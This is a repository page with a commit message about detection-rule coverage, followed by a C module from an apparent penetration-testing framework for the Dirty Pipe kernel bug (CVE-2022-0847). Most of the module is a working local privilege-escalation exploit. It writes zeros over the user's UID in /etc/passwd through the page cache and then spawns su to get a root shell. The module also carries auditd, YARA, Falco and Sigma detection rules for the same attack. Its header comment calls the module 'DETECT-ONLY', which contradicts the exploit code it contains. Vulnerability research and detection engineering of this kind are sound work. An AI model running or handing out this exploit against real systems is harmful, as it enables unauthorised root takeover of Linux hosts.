leviathan
8938a74d04
Closes the 'rules in the box' gap — the README has claimed YARA + Falco coverage but detect_yara and detect_falco were NULL on every module. This commit lights up both formats for the 6 highest-value modules (covering 10 of 31 registered modules via family-shared rules), and the existing operational playbook gains the format-specific deployment recipes + the cross-format correlation table. YARA rules (8 rules, 9 module-headers, 152 lines): - copy_fail_family — etc_passwd_uid_flip + etc_passwd_root_no_password (shared across copy_fail / copy_fail_gcm / dirty_frag_esp / dirty_frag_esp6 / dirty_frag_rxrpc) - dirty_pipe — passwd UID flip pattern, dirty-pipe-specific tag - dirtydecrypt — 28-byte ELF prefix match on tiny_elf[] + setuid+execve shellcode tail, detects the page-cache overlay landing - fragnesia — 28-byte ELF prefix on shell_elf[] + setuid+setgid+seteuid cascade, detects the 192-byte page-cache overlay - pwnkit — gconv-modules cache file format (small text file with module UTF-8// X// /tmp/...) - pack2theroot — malicious .deb (ar archive + SUID-bash postinst) + /tmp/.suid_bash artifact scan Falco rules (13 rules, 9 module-headers, 219 lines): - pwnkit — pkexec with empty argv + GCONV_PATH/CHARSET env from non-root - copy_fail_family — AF_ALG socket from non-root + NETLINK_XFRM from unprivileged userns + /etc/passwd modified by non-root - dirty_pipe — splice() of setuid/credential file by non-root - dirtydecrypt — AF_RXRPC socket + add_key(rxrpc) by non-root - fragnesia — TCP_ULP=espintcp from non-root + splice of setuid binary - pack2theroot — SUID bit set on /tmp/.suid_bash + dpkg invoked by packagekitd with /tmp/.pk-*.deb + 2x InstallFiles on same transaction Wiring: each module's .detect_yara and .detect_falco struct fields now point at the embedded string. The dispatcher dedups by pointer, so family-shared rules emit once across the 5 sub-modules. docs/DETECTION_PLAYBOOK.md augmented (302 -> 456 lines): - New 'YARA artifact scanning' subsection under SIEM integration with scheduled-scan cron pattern + per-rule trigger table - New 'Falco runtime detection' subsection with deploy + per-rule trigger table - New 'Per-module detection coverage' table — 4-format matrix - New 'Correlation across formats' section — multi-format incident signature per exploit (the 3-of-4 signal pattern) - New 'Worked example: catching DirtyDecrypt end-to-end' walkthrough from Falco page through yara confirmation, recovery, hunt + patch The existing operational lifecycle / SIEM patterns / FP tuning content is preserved unchanged — this commit only adds. Final stats: - auditd: 109 rule statements across 27 modules - sigma: 16 sigma rules across 19 modules - yara: 8 yara rules across 9 module headers (5 family + 4 distinct) - falco: 13 falco rules across 9 module headers The remaining 21 modules can gain YARA / Falco coverage incrementally by populating their detect_yara / detect_falco struct fields.
531 lines
21 KiB
C
531 lines
21 KiB
C
/*
|
|
* dirty_pipe_cve_2022_0847 — SKELETONKEY module
|
|
*
|
|
* Status: 🔵 DETECT-ONLY for now. Exploit lifecycle is a follow-up
|
|
* commit (the C code is well-understood — Max Kellermann's public PoC
|
|
* is the reference — but landing it under the skeletonkey_module
|
|
* interface needs the shared passwd-field/exploit-su helpers in core/
|
|
* which are deferred to Phase 1.5).
|
|
*
|
|
* Affected kernel ranges:
|
|
* 5.8 ≤ K < 5.17 (mainline fix at 5.17, commit 9d2231c5d74e)
|
|
* 5.15.x: K ≤ 5.15.24 (fixed in 5.15.25)
|
|
* 5.10.x: K ≤ 5.10.101 (fixed in 5.10.102)
|
|
* 5.4.x : not affected (bug introduced in 5.8)
|
|
*
|
|
* Detect logic:
|
|
* - Parse uname() release into major.minor.patch
|
|
* - If kernel < 5.8 → SKELETONKEY_OK (bug not introduced yet)
|
|
* - If kernel is on a branch with a known backport, compare patch
|
|
* level (above threshold = patched, below = vulnerable)
|
|
* - If kernel >= 5.17 → SKELETONKEY_OK (mainline fix)
|
|
* - Otherwise → SKELETONKEY_VULNERABLE
|
|
*
|
|
* Edge case: distros sometimes ship custom-numbered kernels (e.g.
|
|
* Ubuntu's `5.15.0-100-generic` where the .100 is Ubuntu's release
|
|
* counter, NOT the upstream patch level). For now we treat that as
|
|
* an unknown distro backport and report SKELETONKEY_TEST_ERROR with a
|
|
* hint. A future enhancement: parse /proc/version's full string
|
|
* which usually includes the upstream patch level after the distro
|
|
* suffix.
|
|
*/
|
|
|
|
#include "skeletonkey_modules.h"
|
|
#include "../../core/registry.h"
|
|
|
|
/* _GNU_SOURCE is passed via -D in the top-level Makefile; do not
|
|
* redefine here (warning: redefined). */
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <stdbool.h>
|
|
#include <unistd.h>
|
|
|
|
#ifdef __linux__
|
|
|
|
#include "../../core/kernel_range.h" /* used inside this block only */
|
|
#include "../../core/host.h"
|
|
#include <fcntl.h>
|
|
#include <errno.h>
|
|
#include <sys/stat.h>
|
|
#include <sys/mman.h>
|
|
#include <pwd.h>
|
|
|
|
/* ---- Dirty Pipe primitive ---------------------------------------- */
|
|
|
|
/* Fill the pipe to the brim, then drain — the kernel marks every
|
|
* pipe_buffer slot with PIPE_BUF_FLAG_CAN_MERGE during the fill, and
|
|
* the bug is that this flag SURVIVES the drain. So when we splice() a
|
|
* file page in next, the slot inherits the merge flag and any
|
|
* subsequent write() to the pipe lands in the file's page cache. */
|
|
static int prepare_pipe(int p[2])
|
|
{
|
|
if (pipe(p) < 0) return -1;
|
|
int pipe_size = fcntl(p[1], F_GETPIPE_SZ);
|
|
if (pipe_size < 0) pipe_size = 65536;
|
|
static char buf[4096];
|
|
for (int r = pipe_size; r > 0;) {
|
|
int n = r > (int)sizeof(buf) ? (int)sizeof(buf) : r;
|
|
ssize_t w = write(p[1], buf, n);
|
|
if (w < 0) return -1;
|
|
r -= w;
|
|
}
|
|
for (int r = pipe_size; r > 0;) {
|
|
int n = r > (int)sizeof(buf) ? (int)sizeof(buf) : r;
|
|
ssize_t rd = read(p[0], buf, n);
|
|
if (rd < 0) return -1;
|
|
r -= rd;
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
/* Write `data_len` bytes into the page cache of `target_path` starting
|
|
* at byte `offset`. Constraints:
|
|
* - offset must not be page-aligned (Dirty Pipe needs the splice's
|
|
* 1-byte at offset-1 to land in the same page as our write)
|
|
* - data_len must fit in the page containing `offset`
|
|
* - target_path must be readable by the caller
|
|
* - target_path's file size must extend past `offset + data_len`
|
|
* (Dirty Pipe can't extend files). */
|
|
static int dirty_pipe_write(const char *target_path, off_t offset,
|
|
const char *data, size_t data_len)
|
|
{
|
|
if ((offset & 0xfff) == 0) {
|
|
fprintf(stderr, "[-] dirty_pipe_write: offset is page-aligned; refuse\n");
|
|
return -1;
|
|
}
|
|
size_t in_page = 4096 - (offset & 0xfff);
|
|
if (data_len > in_page) {
|
|
fprintf(stderr, "[-] dirty_pipe_write: writes cannot cross page boundary "
|
|
"(have %zu, fits %zu)\n", data_len, in_page);
|
|
return -1;
|
|
}
|
|
int fd = open(target_path, O_RDONLY);
|
|
if (fd < 0) { perror("open target"); return -1; }
|
|
|
|
int p[2];
|
|
if (prepare_pipe(p) < 0) { close(fd); return -1; }
|
|
|
|
/* splice 1 byte from `offset - 1` to seed the pipe slot with the
|
|
* file's page (and inherit the stale CAN_MERGE flag). */
|
|
off_t splice_off = offset - 1;
|
|
ssize_t n = splice(fd, &splice_off, p[1], NULL, 1, 0);
|
|
if (n != 1) {
|
|
fprintf(stderr, "[-] splice failed (n=%zd, errno=%d)\n", n, errno);
|
|
close(fd); close(p[0]); close(p[1]); return -1;
|
|
}
|
|
|
|
/* Now write our payload. The kernel merges it into the file page. */
|
|
ssize_t w = write(p[1], data, data_len);
|
|
|
|
close(fd); close(p[0]); close(p[1]);
|
|
return (w == (ssize_t)data_len) ? 0 : -1;
|
|
}
|
|
|
|
/* ---- /etc/passwd UID-field helpers (inlined; would migrate to
|
|
* core/host.{c,h} once a third module needs them). ------------ */
|
|
|
|
/* Locate the UID field of `username` in /etc/passwd. Returns true on
|
|
* success and fills *uid_off (byte offset of UID), *uid_len (length
|
|
* of UID string), uid_str (copy of UID, NUL-terminated). Requires
|
|
* the UID to be a positive decimal number that fits in 16 bytes. */
|
|
static bool find_passwd_uid_field(const char *username,
|
|
off_t *uid_off, size_t *uid_len,
|
|
char uid_str[16])
|
|
{
|
|
int fd = open("/etc/passwd", O_RDONLY);
|
|
if (fd < 0) return false;
|
|
struct stat st;
|
|
if (fstat(fd, &st) < 0) { close(fd); return false; }
|
|
char *buf = malloc(st.st_size + 1);
|
|
if (!buf) { close(fd); return false; }
|
|
ssize_t r = read(fd, buf, st.st_size);
|
|
close(fd);
|
|
if (r != st.st_size) { free(buf); return false; }
|
|
buf[st.st_size] = 0;
|
|
|
|
/* find line "username:x:UID:GID:..." */
|
|
size_t ulen = strlen(username);
|
|
char *p = buf;
|
|
while (p < buf + st.st_size) {
|
|
char *eol = strchr(p, '\n');
|
|
if (!eol) eol = buf + st.st_size;
|
|
if (strncmp(p, username, ulen) == 0 && p[ulen] == ':') {
|
|
/* Skip past "username:" then password field */
|
|
char *q = p + ulen + 1;
|
|
char *pw_end = memchr(q, ':', eol - q);
|
|
if (!pw_end) goto next;
|
|
char *uid_begin = pw_end + 1;
|
|
char *uid_end = memchr(uid_begin, ':', eol - uid_begin);
|
|
if (!uid_end) goto next;
|
|
size_t L = uid_end - uid_begin;
|
|
if (L == 0 || L >= 16) goto next;
|
|
memcpy(uid_str, uid_begin, L);
|
|
uid_str[L] = 0;
|
|
*uid_off = (off_t)(uid_begin - buf);
|
|
*uid_len = L;
|
|
free(buf);
|
|
return true;
|
|
}
|
|
next:
|
|
p = eol + 1;
|
|
}
|
|
free(buf);
|
|
return false;
|
|
}
|
|
|
|
/* Evict /etc/passwd from page cache after exploitation. POSIX_FADV_DONTNEED
|
|
* works as a non-root hint; if it doesn't take, try `drop_caches` which
|
|
* requires root (which we just acquired). */
|
|
static void revert_passwd_page_cache(void)
|
|
{
|
|
int fd = open("/etc/passwd", O_RDONLY);
|
|
if (fd >= 0) {
|
|
posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
|
|
close(fd);
|
|
}
|
|
/* Belt-and-suspenders: drop_caches=3 wipes all page cache. Best-effort. */
|
|
int dc = open("/proc/sys/vm/drop_caches", O_WRONLY);
|
|
if (dc >= 0) {
|
|
if (write(dc, "3\n", 2) < 0) { /* ignore */ }
|
|
close(dc);
|
|
}
|
|
}
|
|
|
|
|
|
|
|
/* The bug exists on every kernel from 5.8 (introduction) until the
|
|
* fix is backported to that branch. We model "patched" as:
|
|
* - on the 5.10 branch: 5.10.102 or later
|
|
* - on the 5.15 branch: 5.15.25 or later
|
|
* - any kernel 5.16 or later (mainline fix landed for 5.17, so 5.16
|
|
* only needs 5.16.11 or later; 5.17+ inherits)
|
|
* - mainline (≥ 5.17) is patched
|
|
*/
|
|
static const struct kernel_patched_from dirty_pipe_patched_branches[] = {
|
|
{5, 10, 102}, /* 5.10.x backport */
|
|
{5, 15, 25}, /* 5.15.x backport */
|
|
{5, 16, 11}, /* 5.16.x backport (mainline fix lived here briefly) */
|
|
{5, 17, 0}, /* mainline fix lands; everything from here is fine */
|
|
};
|
|
|
|
static const struct kernel_range dirty_pipe_range = {
|
|
.patched_from = dirty_pipe_patched_branches,
|
|
.n_patched_from = sizeof(dirty_pipe_patched_branches) /
|
|
sizeof(dirty_pipe_patched_branches[0]),
|
|
};
|
|
|
|
/* Active sentinel probe: write a known byte into a /tmp probe file
|
|
* via the Dirty Pipe primitive, then re-read to verify the page cache
|
|
* was actually poisoned. This catches the case where /proc/version
|
|
* looks vulnerable (e.g. Debian 5.10.0-30 — apparent version 5.10.30)
|
|
* but the distro silently backported the fix without bumping the
|
|
* upstream version number visible to uname().
|
|
*
|
|
* Side effects: creates and removes a single file under /tmp. No
|
|
* /etc/passwd writes; safe to run from --scan --active. */
|
|
static int dirty_pipe_active_probe(void)
|
|
{
|
|
char probe_path[] = "/tmp/skeletonkey-dirty-pipe-probe-XXXXXX";
|
|
int fd = mkstemp(probe_path);
|
|
if (fd < 0) return -1;
|
|
const char seed[16] = "ABCDABCDABCDABCD";
|
|
if (write(fd, seed, sizeof seed) != sizeof seed) { close(fd); unlink(probe_path); return -1; }
|
|
fsync(fd);
|
|
close(fd);
|
|
|
|
/* Try writing 'X' at offset 4 — well inside the first page, not
|
|
* page-aligned (offset 4 → page-relative offset 4, not 0). */
|
|
int rc = dirty_pipe_write(probe_path, 4, "X", 1);
|
|
if (rc < 0) {
|
|
unlink(probe_path);
|
|
return 0; /* primitive could not even fire — patched or blocked */
|
|
}
|
|
|
|
/* Re-open and read; if the primitive works, byte 4 reads as 'X'.
|
|
* Use O_RDONLY + read, which goes through the page cache (which
|
|
* we just poisoned if the bug is live). */
|
|
fd = open(probe_path, O_RDONLY);
|
|
if (fd < 0) { unlink(probe_path); return -1; }
|
|
char readback[16] = {0};
|
|
ssize_t got = read(fd, readback, sizeof readback);
|
|
close(fd);
|
|
unlink(probe_path);
|
|
if (got < 5) return -1;
|
|
return readback[4] == 'X' ? 1 : 0;
|
|
}
|
|
|
|
static skeletonkey_result_t dirty_pipe_detect(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
/* Consult the shared host fingerprint instead of calling
|
|
* kernel_version_current() ourselves — populated once at startup
|
|
* and identical across every module's detect(). */
|
|
const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
|
|
if (!v || v->major == 0) {
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[!] dirty_pipe: host fingerprint missing kernel "
|
|
"version — bailing\n");
|
|
return SKELETONKEY_TEST_ERROR;
|
|
}
|
|
|
|
/* Bug introduced in 5.8. */
|
|
if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 8, 0)) {
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[i] dirty_pipe: kernel %s predates the bug (introduced in 5.8)\n",
|
|
v->release);
|
|
}
|
|
return SKELETONKEY_OK;
|
|
}
|
|
|
|
bool patched_by_version = kernel_range_is_patched(&dirty_pipe_range, v);
|
|
|
|
/* Active probe overrides version-only verdict when requested.
|
|
* The version check is necessary-but-not-sufficient: distros
|
|
* silently backport fixes without bumping the upstream version
|
|
* visible to uname(). The active probe fires the actual primitive
|
|
* and confirms whether it lands. */
|
|
if (ctx->active_probe) {
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[*] dirty_pipe: running active sentinel probe (safe; /tmp only)\n");
|
|
}
|
|
int probe = dirty_pipe_active_probe();
|
|
if (probe == 1) {
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[!] dirty_pipe: ACTIVE PROBE CONFIRMED — primitive lands "
|
|
"(version %s)\n", v->release);
|
|
}
|
|
return SKELETONKEY_VULNERABLE;
|
|
}
|
|
if (probe == 0) {
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[+] dirty_pipe: active probe sentinel did NOT land — "
|
|
"primitive blocked (likely patched%s)\n",
|
|
patched_by_version ? "" : ", or distro silently backported");
|
|
}
|
|
return SKELETONKEY_OK;
|
|
}
|
|
/* probe < 0: probe machinery failed (mkstemp/open/read) — fall
|
|
* back to version-only verdict and report TEST_ERROR caveat */
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[?] dirty_pipe: active probe machinery failed; "
|
|
"falling back to version check\n");
|
|
}
|
|
}
|
|
|
|
if (patched_by_version) {
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[+] dirty_pipe: kernel %s is patched (version-only check; "
|
|
"use --active to confirm empirically)\n", v->release);
|
|
}
|
|
return SKELETONKEY_OK;
|
|
}
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[!] dirty_pipe: kernel %s appears VULNERABLE (version-only check)\n"
|
|
" Confirm empirically: re-run with --scan --active\n",
|
|
v->release);
|
|
}
|
|
return SKELETONKEY_VULNERABLE;
|
|
}
|
|
|
|
static skeletonkey_result_t dirty_pipe_exploit(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
/* Re-confirm vulnerability before writing to /etc/passwd. */
|
|
skeletonkey_result_t pre = dirty_pipe_detect(ctx);
|
|
if (pre != SKELETONKEY_VULNERABLE) {
|
|
fprintf(stderr, "[-] dirty_pipe: detect() says not vulnerable; refusing to exploit\n");
|
|
return pre;
|
|
}
|
|
|
|
/* Resolve current user. Consult ctx->host->is_root for the
|
|
* already-root short-circuit so unit tests can construct a
|
|
* non-root fingerprint regardless of the test process's real euid. */
|
|
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
|
|
if (is_root) {
|
|
fprintf(stderr, "[i] dirty_pipe: already running as root — nothing to escalate\n");
|
|
return SKELETONKEY_OK;
|
|
}
|
|
uid_t euid = geteuid();
|
|
struct passwd *pw = getpwuid(euid);
|
|
if (!pw) {
|
|
fprintf(stderr, "[-] dirty_pipe: getpwuid(%d) failed: %s\n", euid, strerror(errno));
|
|
return SKELETONKEY_TEST_ERROR;
|
|
}
|
|
|
|
/* Find the UID field. Need a 4-digit-or-similar UID we can replace
|
|
* with "0000" of identical width. Refuse if the user's UID width
|
|
* doesn't fit our replacement string. */
|
|
off_t uid_off;
|
|
size_t uid_len;
|
|
char orig_uid[16] = {0};
|
|
if (!find_passwd_uid_field(pw->pw_name, &uid_off, &uid_len, orig_uid)) {
|
|
fprintf(stderr, "[-] dirty_pipe: could not locate %s's UID field in /etc/passwd\n",
|
|
pw->pw_name);
|
|
return SKELETONKEY_TEST_ERROR;
|
|
}
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[*] dirty_pipe: user '%s' UID '%s' at offset %lld (len %zu)\n",
|
|
pw->pw_name, orig_uid, (long long)uid_off, uid_len);
|
|
}
|
|
|
|
/* Build replacement: zeros of the same length so we don't shift
|
|
* the line layout. "0000" for a 4-digit UID, "00000" for 5, etc. */
|
|
char replacement[16];
|
|
memset(replacement, '0', uid_len);
|
|
replacement[uid_len] = 0;
|
|
|
|
/* Edge case: if offset is page-aligned, splice/CAN_MERGE primitive
|
|
* can't reach it (see prepare_pipe/dirty_pipe_write comments).
|
|
* Vanishingly rare — first user in /etc/passwd typically lives
|
|
* far past the file's first 4096 bytes. Refuse cleanly. */
|
|
if ((uid_off & 0xfff) == 0) {
|
|
fprintf(stderr, "[-] dirty_pipe: UID field is page-aligned; primitive can't write here\n");
|
|
return SKELETONKEY_EXPLOIT_FAIL;
|
|
}
|
|
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[*] dirty_pipe: overwriting UID '%s' → '%s' via page-cache write\n",
|
|
orig_uid, replacement);
|
|
}
|
|
if (dirty_pipe_write("/etc/passwd", uid_off, replacement, uid_len) < 0) {
|
|
fprintf(stderr, "[-] dirty_pipe: page-cache write failed\n");
|
|
return SKELETONKEY_EXPLOIT_FAIL;
|
|
}
|
|
|
|
if (ctx->no_shell) {
|
|
fprintf(stderr, "[+] dirty_pipe: --no-shell — patch landed; not spawning su.\n"
|
|
"[i] dirty_pipe: revert with `skeletonkey --cleanup dirty_pipe`\n");
|
|
return SKELETONKEY_EXPLOIT_OK;
|
|
}
|
|
|
|
/* /etc/passwd now reports our user as uid 0 (in the page cache).
|
|
* `su` reads the page cache, sees uid 0, drops a root shell. */
|
|
fprintf(stderr, "[+] dirty_pipe: page cache poisoned; spawning su to claim root\n");
|
|
fflush(NULL);
|
|
execlp("su", "su", pw->pw_name, "-c", "/bin/sh", (char *)NULL);
|
|
/* If execlp returns, su didn't actually pop root — revert and report. */
|
|
perror("execlp(su)");
|
|
revert_passwd_page_cache();
|
|
return SKELETONKEY_EXPLOIT_FAIL;
|
|
}
|
|
|
|
static skeletonkey_result_t dirty_pipe_cleanup(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
(void)ctx;
|
|
if (!ctx->json) {
|
|
fprintf(stderr, "[*] dirty_pipe: evicting /etc/passwd from page cache\n");
|
|
}
|
|
revert_passwd_page_cache();
|
|
return SKELETONKEY_OK;
|
|
}
|
|
|
|
#else /* !__linux__ */
|
|
|
|
/* Non-Linux dev builds: splice() / F_GETPIPE_SZ / posix_fadvise() are
|
|
* Linux-only kernel surface; the Dirty Pipe primitive is structurally
|
|
* unreachable elsewhere. Stub out cleanly so the module still
|
|
* registers and `--list` / `--detect-rules` work on macOS/BSD dev
|
|
* boxes — and so the top-level `make` actually completes there. */
|
|
static skeletonkey_result_t dirty_pipe_detect(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
if (!ctx->json)
|
|
fprintf(stderr, "[i] dirty_pipe: Linux-only module "
|
|
"(splice + PIPE_BUF_FLAG_CAN_MERGE) — not applicable here\n");
|
|
return SKELETONKEY_PRECOND_FAIL;
|
|
}
|
|
static skeletonkey_result_t dirty_pipe_exploit(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
(void)ctx;
|
|
fprintf(stderr, "[-] dirty_pipe: Linux-only module — cannot run here\n");
|
|
return SKELETONKEY_PRECOND_FAIL;
|
|
}
|
|
static skeletonkey_result_t dirty_pipe_cleanup(const struct skeletonkey_ctx *ctx)
|
|
{
|
|
(void)ctx;
|
|
return SKELETONKEY_OK;
|
|
}
|
|
|
|
#endif /* __linux__ */
|
|
|
|
/* Embedded detection rules — keep the binary self-contained so
|
|
* `skeletonkey --detect-rules --format=auditd` works without a separate
|
|
* data-dir install. */
|
|
static const char dirty_pipe_auditd[] =
|
|
"# Dirty Pipe (CVE-2022-0847) — auditd detection rules\n"
|
|
"# See modules/dirty_pipe_cve_2022_0847/detect/auditd.rules for full version.\n"
|
|
"-w /etc/passwd -p wa -k skeletonkey-dirty-pipe\n"
|
|
"-w /etc/shadow -p wa -k skeletonkey-dirty-pipe\n"
|
|
"-w /etc/sudoers -p wa -k skeletonkey-dirty-pipe\n"
|
|
"-w /etc/sudoers.d -p wa -k skeletonkey-dirty-pipe\n"
|
|
"-a always,exit -F arch=b64 -S splice -k skeletonkey-dirty-pipe-splice\n"
|
|
"-a always,exit -F arch=b32 -S splice -k skeletonkey-dirty-pipe-splice\n";
|
|
|
|
static const char dirty_pipe_yara[] =
|
|
"rule dirty_pipe_passwd_uid_flip : cve_2022_0847 page_cache_write\n"
|
|
"{\n"
|
|
" meta:\n"
|
|
" cve = \"CVE-2022-0847\"\n"
|
|
" description = \"Dirty Pipe (CVE-2022-0847): /etc/passwd page-cache UID flip — non-root username remapped to UID 0000+. Scan /etc/passwd directly; legitimate root entries use '0:', never '0000:'.\"\n"
|
|
" author = \"SKELETONKEY\"\n"
|
|
" strings:\n"
|
|
" $uid_flip = /\\n[a-z_][a-z0-9_-]{0,30}:[^:]{0,8}:0{4,}:[0-9]+:/\n"
|
|
" condition:\n"
|
|
" $uid_flip\n"
|
|
"}\n";
|
|
|
|
static const char dirty_pipe_falco[] =
|
|
"- rule: Dirty Pipe splice from setuid/sensitive file by non-root\n"
|
|
" desc: |\n"
|
|
" A non-root process calls splice() with a fd pointing at a\n"
|
|
" setuid-root binary or a credential file. The Dirty Pipe\n"
|
|
" primitive (CVE-2022-0847) splices 1 byte from the target to\n"
|
|
" a prepared pipe to inherit the stale PIPE_BUF_FLAG_CAN_MERGE,\n"
|
|
" then writes attacker bytes that land in the file's page cache.\n"
|
|
" condition: >\n"
|
|
" evt.type = splice and not user.uid = 0 and\n"
|
|
" (fd.name in (/etc/passwd, /etc/shadow, /etc/sudoers)\n"
|
|
" or fd.name startswith /usr/bin/su\n"
|
|
" or fd.name startswith /usr/bin/passwd\n"
|
|
" or fd.name startswith /bin/su)\n"
|
|
" output: >\n"
|
|
" Dirty Pipe-style splice from sensitive file by non-root\n"
|
|
" (user=%user.name proc=%proc.name fd=%fd.name pid=%proc.pid)\n"
|
|
" priority: CRITICAL\n"
|
|
" tags: [filesystem, mitre_privilege_escalation, T1068, cve.2022.0847]\n";
|
|
|
|
static const char dirty_pipe_sigma[] =
|
|
"title: Possible Dirty Pipe exploitation (CVE-2022-0847)\n"
|
|
"id: f6b13c08-skeletonkey-dirty-pipe\n"
|
|
"status: experimental\n"
|
|
"logsource: {product: linux, service: auditd}\n"
|
|
"detection:\n"
|
|
" modification:\n"
|
|
" type: 'PATH'\n"
|
|
" name|startswith: ['/etc/passwd', '/etc/shadow', '/etc/sudoers']\n"
|
|
" not_root:\n"
|
|
" auid|expression: '!= 0'\n"
|
|
" condition: modification and not_root\n"
|
|
"level: high\n"
|
|
"tags: [attack.privilege_escalation, attack.t1068, cve.2022.0847]\n";
|
|
|
|
const struct skeletonkey_module dirty_pipe_module = {
|
|
.name = "dirty_pipe",
|
|
.cve = "CVE-2022-0847",
|
|
.summary = "pipe_buffer CAN_MERGE flag inheritance → page-cache write",
|
|
.family = "dirty_pipe",
|
|
.kernel_range = "5.8 ≤ K, fixed mainline 5.17, backports: 5.10.102 / 5.15.25 / 5.16.11",
|
|
.detect = dirty_pipe_detect,
|
|
.exploit = dirty_pipe_exploit,
|
|
.mitigate = NULL,
|
|
.cleanup = dirty_pipe_cleanup,
|
|
.detect_auditd = dirty_pipe_auditd,
|
|
.detect_sigma = dirty_pipe_sigma,
|
|
.detect_yara = dirty_pipe_yara,
|
|
.detect_falco = dirty_pipe_falco,
|
|
};
|
|
|
|
void skeletonkey_register_dirty_pipe(void)
|
|
{
|
|
skeletonkey_register(&dirty_pipe_module);
|
|
}
|